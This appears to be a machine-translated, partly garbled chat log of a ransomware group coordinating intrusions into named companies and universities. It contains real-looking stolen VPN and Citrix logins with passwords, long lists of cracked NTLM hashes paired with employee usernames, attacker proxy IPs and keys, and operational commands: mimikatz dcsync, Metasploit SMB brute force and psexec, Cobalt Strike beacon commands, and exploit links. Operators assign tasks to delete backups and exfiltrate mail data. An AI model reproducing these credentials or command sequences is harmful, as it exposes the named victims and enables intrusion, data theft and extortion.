now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, what do you say?why are you silent? I think nothing in google, but it does not fly there@user8 what's wrong with the cob? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_maskхешкат can do this? https://github.com/hashcat/maskprocessorгугл no need to remind the fuckin' ping, there's nothing wrong with it if not - remind me) so check the method known@tl1 try to pass any session in agesk.com i got nothing from last login, not from coba @user9 check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is not enough to get to ehiska than from putty to pull the cribs for #1-done-crispregional-org in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off. you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it 2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's see what's up? hello everyone https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/ ``from the machines where you can not go dump the craps through the cme how are you doing? 
good morning, thank you all goodnight)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes?good morninGood morninGood morninGood +++ accepted If i will not be there by this time and you have a deadlock you can go home before 1 o'clock then i think how to do it there is an option to do something with relayda, there are about 6 dk and all are patted erogon also past? try all kinds of web services scanners look forda, already tried 100 times on other pc's tried?there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra alsoexcch can't be seen noasharfineedr gave nothing? nothing at all? well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished? dig into snpartners.com. what's the task? 108.62.118.209 https://simvp.com - 104.194.11.10:50058 ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX yes and yes@user9 don't you have t eotclick in sessions? is this new?) i'll ask around and see if anyone has tried it elsewhere) i found the addressee's addressee codes and i'm just messing around with them. i read the docks too) there may be a differentiation of rights for some reason Look at the docks for the suite I can't tell you, but it should be in the documentation.... I'm inside Veeam One monitor and I don't know how to delete backups...it seems to be a cloud version of Veeamclearance have you dealt with VeeamOne? I have! 
``You did, but it's probably expired - it won't let me in.``Hi didn't they give you a Kmd5 account? no, they didn't) ``aac86ad4320f7cca879a87724c7d3647 ``need clears from Kmd5DC ``` Server Name IP Address ----------- ---------- Z1AD3 192.168.1.41 Z1AD2 10.10.0.2 Ok. reshoot it I would recommend that you reshoot the adinfoTill tomorrow, everyone will show extra sessions on this today that[ ](https://mediaeveryone.com/channel/general?msg=cp3jcby6d8QQMTgur) Group is not, so I'm writing here Brut finished, of course nothing was brutalized scanned more on skul, ftp, webs tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2I took kerbsort servers 63sh thought someday will go to the thousandth restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `? there is a hash of LA and a bunch of computers where it fits, but it's all Windows 10 Educational I tried that hash on the servers and it didn't fit. All my sessions are dead and the domain is in the black. trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup:[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) on my got the VPN up - scanned the ip scanner from my ip/16 scanned the ports of the PCs I found, there are some with 445 let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? 
please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic?put vnts and connect so)[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off. After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines https://github.com/Hackndo/lsassy use this one take the time to set it up correctly once. so you have a set VPS on hand for this fuckin' thing right now https://vpn.floridapoly.edu austinwise0712 MechEng030796! ``` @user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option? I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download. In citrix itself, all icons are disabled, everything is not available. https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01 ``` @user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm did not find a console or something where you can send commands or a file to cram Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23 ``` @user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute? ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a confu `AD.HUMBOLDT.EDU` output to confu then why is the output different? 
they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip it's not always clean, but you have to know it or you can uncheck your settings and it will show you the path to the history Get-PSReadLineOption `````` History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt . ``How do you clean it up?`` Who else don't know if you can store command history on the system? https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke ``` @user7 replacementa what do you have? https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$ ``` @user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a personal message new password then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! 
You will soon be issued individual Windows dedics per task in the conf, right away) I am close to a standstill: I had a go yesterday on the /16 on 445 from his subnet, but found nothing) but it's like that. Does everyone have a task? ok. How do you pull the hashes at once? Jump to a couple of servers in addition) naturally) and check whether the account is active at all, so check validity first. Ok, the kerb I saw, will do the dcsync. I'll be back in half an hour and if there are problems I'll look. I need to leave for half an hour now, so just keep working on yesterday's tasks; you also have 4 dedics now, cobs and everything else the same. @user4 are you there? kerb scrubbed) @tl2 to the conf. Hi, not there yet. Anybody here? Hello all :space_invader: tomorrow by 2, today until 10.
```text
System Boot Time: 12/28/2020, 12:01:39 PM
```
He doesn't turn off the machine?
```text
====== AntiVirus ======
Engine       : Spybot - Search and Destroy
ProductEXE   : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
Engine       : Security Manager AV Defender Antimalware
ProductEXE   : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe
Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
```
12:03 PM. AV what? Seems like it should be.
```text
CurrentUser : WATERWAY\mharper
Idletime    : 01h:11m:03s:765ms (4263765 milliseconds)
```
So isn't the keystrokes session supposed to be empty? So maybe he's not typing? On the contrary, the heartbeat is 0 and the session is still dead. I'm not writing a keylogger here. User context in svchost. And the keylogger isn't installed. On mharper-new, under the mharper user, I found this:
```
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2 ``` he also had this in his sharpshooter output ``` http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,, ``` it's nimble, i.e. walks, but no credits( on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting now trying to open two aacdb-shek@tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay? bdfb6cd5e3fd0d06ddcb550a10dd935d Mollydog1! 04d5eff0ad5cfa74893376377799e6e4 Edith@2013 371464bd973caf912b2eb57d6e8b8c8d Soccerfun2! bd626598054a653c5b29362e7ccf0fda @@rdv@r$ 1160d864b8efdbf3a2a7789fb7dbf852 S$ophia91 07d4c3a9293355b60d47b8af140658b5 Babe8652 da1b9ecaaafa492621baec7db4e0768c Dexter56! a6aee6e3cee15dcc6c1da0c0029c9d0e Cheers21 0a1737099297bce33028550c609d51fe Santacruz1 3ef41951b919a7a714f5ccd94d2785b9 Playmakr59 515105422901de09e5147150eae90fc1 Snoopdog6 2aa61789ef2ffea7dde6dd2a669d8b14 Poncho1953 d7a56add2083dbb16f2967ee4a43693c hawaii9 589b85762d8ab451401df29aa7fdc417 Winter2020 f0d246ee027ba7e2222d11f532e33396 RVlife1! 50131ca82ae8323af7bf0a33ce195f6b Ginny12345! 8174a4102f8e0c19ced57f48fbf854ef mima2015 9553947130d99b5305e7c6e2c55f19f6 Bassbass89! 8c07cda602b94dfcf44f1695910a39df Thankgod99* 98bde6ce745eee9db8730f46a1fa4c43 22Marcus22 df3cad6b33ff0a54309cc2c131b7e9fd Cotija207 27909a110b4e50b486d51702bd86857d Quality2! e7be7281093d53dcfabd8eb3970d0393 R1f12l66$ a9aec143fc91ff315015840d0407c7bd Firstone55 65027469316266a14abe5e628cccfcd0 Molly71@ 2b323b1cfec9165938df237613b381a2 Korbel011 f36fee819dad37f174b81b078b296e2e Vineyards15 baf8e023e871f3b5f79512a57c6a62e7 Year2021! 
6189b54305abed05d16b60b48cf72ed7 maguey#5 a8588850ef9e29663757ec2382d8fc3b Jackie38 77a37eab2d43a85725f7c90fee594d59 Korbel58 39e1ce27741039350266829c0f7eb4e8 Lucy@2013 f48f52d28ea79b1d658ca5d66c5bff36 M@tt0420 e4a22d8e7bbec871b341c88c2e94cba2 Welcome123! a1c70a25f68e27c1c0012bb0d58edd66 8barrett! 763ebebf2ba3134afe8f001617a36755 Outofhere! ec3ccfd708b8aad44bde184a8cef8bcf Kaleb2008 3cd4601799b7516ccf31d5216ed6a5fa Doggies123 2857f0e40a794a646315b20612cabce6 Jaxson2020 ce38fef132030421c1f237301b208ac6 Mexico2021 2af0abe976a17fe926f45fbd26ef9b3b Hermida*14 271f5f4c31c1eccd00458e1884f8111a rich@ter35 c15c6cf00354b412ffb695036bb0da0f Ballplayer3 88da42440abb98e98baaf8d71f6788f0 @dv@n+3l 263dccb097be7270f29ad93249f025b3 Nopass20! 1aef4a9d29b3918e068acf0c40a6d0e4 Frankie8835 b03e5d6101f4428fc15a4af13c2d1f67 Korbel!3 9f492d9fd317748b07d36eead23bd236 Autumn1! 0f9b7619fddf9e02d061d3c580b77820 Lovemy4kids 1ac39bdd695eb913a4f0b73d9159e53d ChangeM3@ ba03a114def8d5c913983436960e592c pass@word1 6be408f1e80386822f4b2052f1f84b4e P@ssw0rd3 ´´So I'll let go then?´´ The first three have passed.´´ kirsten.matteri bdfb6cd5e3fd0d06ddcb550a10dd935d mayria.parmeter 04d5eff0ad5cfa74893376377799e6e4 danielle.matsumura 371464bd973caf912b2eb57d6e8b8c8d Jcomfort bd626598054a653c5b29362e7ccf0fda cncsupport 728f33af6ae2a27678028814ab411554 Areoutt 1160d864b8efdbf3a2a7789fb7dbf852 Mhealy 07d4c3a9293355b60d47b8af140658b5 Mroche da1b9ecaaafa492621baec7db4e0768c PAhvenainen e6242a3a5b39d06307c96f3b77f45f59 Rmarson 8d6d8b8edd61fe852558ed756a8991f3 Lrussell a6aee6e3cee15dcc6c1da0c0029c9d0e Mindrebo 0a1737099297bce33028550c609d51fe Bwalsh 3ef41951b919a7a714f5ccd94d2785b9 Gruhland 02b67f42c10f9ce871cd7b24ac0bdff7 Debbie d74378f8a658b50b8acbd4032490fabe Chakola 515105422901de09e5147150eae90fc1 Serena 891612a4d50457d2c543bc37f0563e90 Dfaris 3fafb54aa5524a39f1298338f6464335 Shollander 2aa61789ef2ffea7dde6dd2a669d8b14 Candrade d7a56add2083dbb16f2967ee4a43693c Kfaris 752084462e4136656173014ec09bd462 
Lreynaga 589b85762d8ab451401df29aa7fdc417 Lcabitac f0d246ee027ba7e2222d11f532e33396 Sschlabach 50131ca82ae8323af7bf0a33ce195f6b Ahealey 8174a4102f8e0c19ced57f48fbf854ef Jbidia 4168560575faed5ed2547df2d5935a31 Drhodehamel d5c9925e3cc9d79772c079bccca7b41b matthealey aaaa2ed2f1ae8dbd18bbd1eff3b90ce6 Aomiotek 9553947130d99b5305e7c6e2c55f19f6 jkrambs 201948eb76f41a6cd4ee48ce49702805 Dan ace98571b9d8b729bc3907c274fe5421 jeannine 8c07cda602b94dfcf44f1695910a39df Dhaught 98bde6ce745eee9db8730f46a1fa4c43 Gary 8f356149e6b800293dbf993e2cfa0a8f Jrobertson d96d7fa2b91611712a551cdd11464fb9 Tmazzola 959541859e8db46868cf0c28dc959339 Dsanchez df3cad6b33ff0a54309cc2c131b7e9fd Ltorres 27909a110b4e50b486d51702bd86857d Rvalencia e7be7281093d53dcfabd8eb3970d0393 lgiang a9aec143fc91ff315015840d0407c7bd Jyoungberg 65027469316266a14abe5e628cccfcd0 Hsiniscalco b939fe7947d85a151fde29b100f3d073 Hcscalehouse1 6b3585ea1524578e252eb70e11b40362 hcscalehouse2 6b3585ea1524578e252eb70e11b40362 senturus 70032882faf3427cf9904be36750fee1 senturus2 70032882faf3427cf9904be36750fee1 Econtreras 1973d3c3267dbfe1729e58c3858262fc llarrabure 2b323b1cfec9165938df237613b381a2 acrolon e0550f6bb9fa17fd37815f201639ff1a sdostert cb0d3dc3f81b8963a903cba7ebe02eda Cmilton e8200daf6b049f0195e235a374e8f62c Khewson f36fee819dad37f174b81b078b296e2e Cnelson baf8e023e871f3b5f79512a57c6a62e7 Ppicazo 6189b54305abed05d16b60b48cf72ed7 twood a8588850ef9e29663757ec2382d8fc3b slopez 77a37eab2d43a85725f7c90fee594d59 kdion 39e1ce27741039350266829c0f7eb4e8 Sloopstra 0ba96b15abe438a3f7e79ffe53de3c96 Svaladez 1e7118c5a0c432e782b748686c178fcd elamb 3238e1417db8896aa9314d33833366c0 mignacio f48f52d28ea79b1d658ca5d66c5bff36 Bjackson 07502ae807bce83b122f8c1bb3422b54 mmensinger 71738c116989d08d9ef06732a8abad93 will.whiteside e4a22d8e7bbec871b341c88c2e94cba2 jennifer.bond a1c70a25f68e27c1c0012bb0d58edd66 denovo 9953126c4fda15c961b170ec582f64fb chelsea.symmonds 763ebebf2ba3134afe8f001617a36755 luciente.villanueva 
ec3ccfd708b8aad44bde184a8cef8bcf jordan.fanucchi 3cd4601799b7516ccf31d5216ed6a5fa dan.murphy ab433395e941fc7ede1a74b69537435a edward.silva 2857f0e40a794a646315b20612cabce6 exocet f07ead77a7ffd23bb963ba68815c7c07 kerri.jensen 2144c88c66e286b224c51df66dffcd0f aaron.debeers ce38fef132030421c1f237301b208ac6 melina.rivera 2af0abe976a17fe926f45fbd26ef9b3b caitlyn.moore e80b6e82c8c7136b3a856b3ef0f7a529 susan.hazy 812ce3386fcf3069766863c9560cd9d5 barry.levine 271f5f4c31c1eccd00458e1884f8111a brian.mcclusky c15c6cf00354b412ffb695036bb0da0f tom.poland 88da42440abb98e98baaf8d71f6788f0 casey.howard 8d09aec6edff573fa9bafa8c301f7d55 cheri.canada 263dccb097be7270f29ad93249f025b3 smokey.chaiyavong 1aef4a9d29b3918e068acf0c40a6d0e4 Courtney.Boosinger b03e5d6101f4428fc15a4af13c2d1f67 davey.santamaria d43e29494f8a512628556209325910af amanda.smith 9f492d9fd317748b07d36eead23bd236 kristina.karan 0f9b7619fddf9e02d061d3c580b77820 denovoms be2db0a50a166e29553ed4327fbfed87 perry.reyes 1ac39bdd695eb913a4f0b73d9159e53d chris.pixton ba03a114def8d5c913983436960e592c shirley.price e862901df2517d9e9b3edac2225eda71 Libby.Fifer 6be408f1e80386822f4b2052f1f84b4e robert.lacy a22ddddb0061bb5749884050d9475a49 lookingpoint a65c6ee963098bd3c5d5c623315efd4f alexandra.ogorman 612410304a2ed887f6bc4109ba2f3541 Siobhan.Johnson f156bd3e058922a64b0257a7ee93c6f4 schedule ca2b3bf6af89151f2c40299fe279307c ``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? 
we have @user3 with #evo-com @user8 with #1-done-korbel-com @user4 @user7 with #waterway-comwhich one of them should have admin rights therefind the mail server - try the acctsDa clarification of some circumstances, just lack of data on the network itselfa what are these changes related to?as you go along, I think you'll figure it out, I think you select mail - ehroghty where there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backup is a additional url on the server and like it `/ecp ` what is it exchange admin sektepoka only 1 option of developmentkak what algorithm of actions after finding the servak itself?yes i think how to formulate the question on this point@user7 and @user8 tell me how to do the 3 point) yes, you)[ ](https://mediaeveryone.com/channel/general?msg=wcGT7Kum4gkjpBfCj) and yet) there is a question on these points i will not answer any more@all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gblistings is clear, but backups are heavy. do we download? so there are no questions later[ ](https://mediaeveryone.com/channel/general?msg=dd53m3dEGGvG3cL69) @all all saw?[ ](https://mediaeveryone.com/channel/general?msg=XFXSWgCDeHQPLFrGX) what is it about?+ additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines?[ ](https://mediaeveryone.com/channel/general?msg=YCFp4f789HRuFcdwx) ok, I would have that archive - came you under @user9 logged in? you seem to be in the confineshelp with waterwayapplication is closed/closed. I reinstalled it, so far it works, what's wrong with it? f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$ 29742bb43819d7ac0f12e0abec4ae5ce W3lcome? 29742bb43819d7ac0f12e0abec4ae5ce W3lcome? 
06d681b7146acf1131ad37740fc9d902 #Ch3ckm30ut# 393f7aa28c905690ffe626d41a814343 agpmadmin f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$ bd626598054a653c5b29362e7ccf0fda @@rdv@r$ 36c873c206d2d7561f356fdc9c6c7298 switchscan 2839726ca10411244ad1fda1149a335c fkb1882 I'll give you the hashes above, you can check[ ](https://mediaeveryone.com/channel/general?msg=g63wScBdhr2cDqgdz) yes, YES long time ago should have changed, right?[ ](https://mediaeveryone.com/channel/general?msg=GFSYB3Aimw3z2vMas) and stop ... YES these on kmd5 passed ben.mandeville f2bad4ac1e1a8562a7275c93d73bddeb daniel.harvey 29742bb43819d7ac0f12e0abec4ae5ce daniel.harvey_adm 29742bb43819d7ac0f12e0abec4ae5ce Honcho 06d681b7146acf1131ad37740fc9d902 agpm_admin 393f7aa28c905690ffe626d41a814343 Ben.mandeville_adm f2bad4ac1e1a8562a7275c93d73bddeb Jcomfort bd626598054a653c5b29362e7ccf0fda switchscan 36c873c206d2d7561f356fdc9c6c7298 SMSadmin 2839726ca10411244ad1fda1149a335c ``I think there's about domain authorization there.``Are you trying to admin? They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups similarwhen our process is complemented by the following actions: 1) remove backups listings up to 7 levels of nesting 2) whine file listings or table structures 3) Backup of mail server 4) fetch 3-4 file backups from the network, and immediately adinfodsink is in the archive above? and try to access these links, you need to pull from the ntds hashes of all users from the group associated with vpn://vpn.korbel.com/global-protect/login.espURL : https://vpn1.korbel.com/+webvpn+/index.htmlhttps://vpn2.korbel.com/global-protect/login.еѕрнужен 1 volunteer to korbel) even lessa in the confab? not much at all (here are such messages from the network, information about external accesses anything interesting there, in principle... and you need something specific? already looking at the question is important check it comptipo what, come to life? user9 should be nothing? 
backups listings, network architecture files-who left interesting files from #1-done-korbel-com ?so once again, to all the questions when some changes in the work he has something with the rock I @user4 not in the network today@user9 absent, so everything is in place, get it all vpna password what is it? zgLLMB1KXkzV6Dtn4GWQ8S49+accesses someone already have `104.171.123.166:45330` it's not new, but not too dirty+disassemble and report who got what2 clean`` 23.106.160.165 https://rawint.com ---------------------------------------------------------------------------------------- 172.93.109.18:51630 S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx `````` 172.241.27.18 https://agesk.com ---------------------------------------------------------------------------------------- 209.222.97.8:62460 TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o ``in the work we have #waterway-com #evo-com I will give out two new clean the old koba is preparing to close and let's more distribute so then wait for everyone I'm hooked there for closing already, did not catch this momentkat some database files, structures, backups and other things it is not interesting)pinganut on it remained build and hosts[ ](https://mediaeveryone.Pri vet! Little@user3 here, but you corbel no "interesting" files? + the rest are delayed? so zhesam how? yes with a knocked-down sleep mode is not very restfulHi all, happy holidays) as you had a rest?:space_invader:lol, fixed it) no connection to the dk for a while The sessions stayed I'm still connected to itc-us.com,kznm I couldn't get anywhere tried zerologon It seemed to work but it won't let me remove dcsync mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. 
/authpassword:"" /authntlm just doesn't output anything after running the command pth doesn't work because I don't have rights to run it Same as yesterday brute force attack didn't work I will try to dig into the networking hardware ``msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/acta/pwd7-12-utf.txt pass_file => /home/acta/pwd7-12-utf.txt msf6 auxiliary(scanner/smb/smb_login) > run [*] Scanned 4 of 22 hosts (18% complete) [*] Scanned 8 of 22 hosts (36% complete) [*] Scanned 8 of 22 hosts (36% complete) [*] Scanned 9 of 22 hosts (40% complete) [*] Scanned 11 of 22 hosts (50% complete) msf6 auxiliary(scanner/smb/smb_login) > options [*] Error: 192.168.1.137: RubySMB::Error::NegotiationFailure Unable to negotiate SMB1 with the remote host: Read timeout expired when reading from the Socket (timeout=30) [*] Scanned 14 of 22 hosts (63% complete) [*] Scanned 16 of 22 hosts (72% complete) [*] Scanned 18 of 22 hosts (81% complete) [*] Scanned 20 of 22 hosts (90% complete) [*] Scanned 22 of 22 hosts (100% complete) [*] Auxiliary module execution completed ``No progress so far. Charging brut smb https://github.com/Ridter/cve-2020-0688 https://github.com/zcgonvh/CVE-2020-0688 https://github.com/Yt1g3r/CVE-2020-0688_EXP The ``things''. Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability I think they have it internally and look for their exh1) I don't think a reset will work under that 2) i don't think it will work under another account so if your user is already an admin here, on the nasa disabled interactions through utilities and it goes as fs100-102 you 3 hosts - NetApp with a large number of balls confused you 3 hosts what exactly - nasa? well smb_login says he there admin on the three that abovea stop some local admin group on the 3?at least on these machines where? so we have an admin jetak on this case need admin rights to the machine where you will reset) clearing no chance? 
password depends on something else most likely ablyahmnu I actually have two and alive, I will not check more until he hash on the two cars does not coincide `` `` Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494::: ``+ since there are 30k pk there is 100% exchange serverpk from the same group where rem sapp found check thisocgroup - OU=ocean or sabnet I would say subnet you mean subnet by group? 1 the group on satnets and users? webmordoy, satnets how so? mostly there satnets around 20a in their group?((almost 30kahahaha how many pk in ad comps? + is there a point? smb_login not tried it yesterday i tried to pull cars with it, not all succeeded it did not roll anywhere? yes, local`` Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:295b43446eb7ee2c640e238481366061::: ``I don't think they went everywhere and changed it by the way this Remote Support is local as I rememberRemote Support did not find a new one? before the change of the password it was a long time ago he collected them[ ](https://mediaeveryone.com/group/snpartners-com?msg=uc5wJRzd5E7tPvt8h) and with these all? 10.51.128.230 on two subnets there is only one car with rdp is closed at them? [*] 172.31.190.102:445 - Executing the command... [*] 172.31.190.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] ... [-] 172.31.190.102:445 - Unable to execute specified command: Failed to bind. Could not bind to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] [-] 172.31.190.102:445 - Unable to connect for cleanup: The server responded with an unexpected status code: STATUS_ACCESS_DENIED. Maybe you'll need to manually remove \WINDOWS\Temp\DmWDlRDmpcujzxcN.bat from the target. 
[*] 172.31.190.102:445 - Scanned 1 of 1 hosts (100% complete) `````` setg Proxies socks4:107.161.126.162:2914 ``and give sockshmm[vvv some load on it now just psexec?[ ](https://mediaeveryone.com/group/snpartners-com?msg=9DgDeXLzLH2H9aMgo) psexec_command``. beacon> shell wmic /node:172.31.190.100 /user:JDOSSN\nddevbernst /password:Tractor20! OS GET Name [*] Tasked beacon to run: wmic /node:172.31.190.100 /user:JDOSSN\ndevbernst /password:Tractor20! OS GET Name [+] host called home, sent: 114 bytes [+] received output: Node - 172.31.190.100 ERROR: Description = The RPC server is unavailable. ``a vmik?`` beacon> shell net use * \\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20! [*] Tasked beacon to run: net use *\\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20! [+] host called home, sent: 96 bytes [+] received output: System error 5 has occurred. Access is denied. 1) without the \ at the end 2) with a direct quote beacon> shell net use \\172.31.190.101!\C$\ [*] Tasked beacon to run: net use \\\172.31.190.101\C$\ [+] host called home, sent: 59 bytes [+] received output: System error 53 has occurred. The network path was not found. 
`````` beacon> net share \\\172.31.190.101 [*] Tasked beacon to run net share on 172.31.190.101 [+] host called home, sent: 104505 bytes [+] received output: Shares at \172.31.190.101: Share name Comment ---------- ------- ILPRARIESTATE_HD DHS_AVTEST WAWASHINGTON_HD WAWASHINGTON_EQARC TXSOUTH_HD TXSOUTH_EQARC TXRAYLEE_HD TXRAYLEE_EQARC TXQUALITY_HD TXQUALITY_EQARC TXBEPARTNERS_HD TXBEPARTNERS_EQARC TXAGPOWER_HD TXAGPOWER_EQARC TNRITCHIE_HD TNRITCHIE_EQARC TNGENERAL_HD Sybase_Shared SKMAPLEFARM_HD SKMAPLEFARM_EQARC SKJAYDEE_HD SKJAYDEE_EQARC SDGROSSENBURG_HD SDGROSSENBURG_EQARC SDAttachVol2 SDAttachVol1 rontest1$ QuorumFileWitnessA profvol2 profvol1 OHLESLIE_HD OHLESLIE_EQARC OHFINDLAY_HD OHFINDLAY_EQARC NYZAHMANDMATSON_EQARC NYCAZENOVIA_HD NYCAZENOVIA_EQARC NMPECOS_HD NMPECOS_EQARC NESTUTHEIT_HD NEGREENLINE_HD NEGREENLINE_EQARC NDLEADING_HD NDLEADING_EQARC NDGRAFTON_HD NDGRAFTON_EQARC NDDAKOTA_HD NDDAKOTA_EQARC NCSOUTHEASTFARM_HD NCSOUTHEASTFARM_EQARC NBGREENDIAMOND_HD NBGREENDIAMOND_EQARC MX_Shared MTFRONTLINEAGSOL_HD MTFRONTLINEAGSOL_EQARC MTFRONTLINE_HD MTFRONTLINE_EQARC MOJFROLING_HD MOHORIZON_HD MNMANKATO_HD MNHAUG_HD MNHAUG_EQARC MITRICOUNTY_HD MITRICOUNTY_EQARC MIDANDG_HD MIDANDG_EQARC MexicoHomeDir KYLIMESTONE_HD KYLIMESTONE_EQARC KSAMERICAN_HD KSAMERICAN_EQARC Keys$ JDISHomeDir JDIS_Shared JDIS_HD JDIS_EQARC ipc$ ILSAMPLE_HD ILPRAIRIESTATE_HD ILPRAIRIESTATE_EQARC ILNEFF_HD ILNEFF_EQARC ILMARTINSULLIVAN_HD ILMARTINSULLIVAN_EQARC ILKELLYSAUDERR_HD ILKELLYSAUDERR_EQARC ILJDISINFRASOL_HD ILJDISEQUIP_HD ILJDISEQUIP_EQARC ILITECERTLOADTEST_HD ILITECERT_HD ILITECERT2_HD ILHOLLAND_HD-path ILHOLLAND_HD ILHOLLAND_EQARC ILHOGANWALKER_HD ILDEMO_HD ILCROSS_HD ILCROSS_EQARC ILCITRATEST_HD ILARENDSBROS_HD ILARENDSBROS_EQARC ILARENDSAWE_HD ILARENDSAWE_EQARC ILARENDSANDSONS_HD ILARENDSANDSONS_EQARC iaworkshopvol IAWORKSHOP_HD IAWORKSHOP_EQARC IASCHENKELBERG_EQARC IAPHELPS_HD IAPHELPS_EQARC IAHULTGREN_HD IABRAKKE_HD IABRAKKE_EQARC IABODENSTEINER_HD IABODENSTEINER_EQARC 
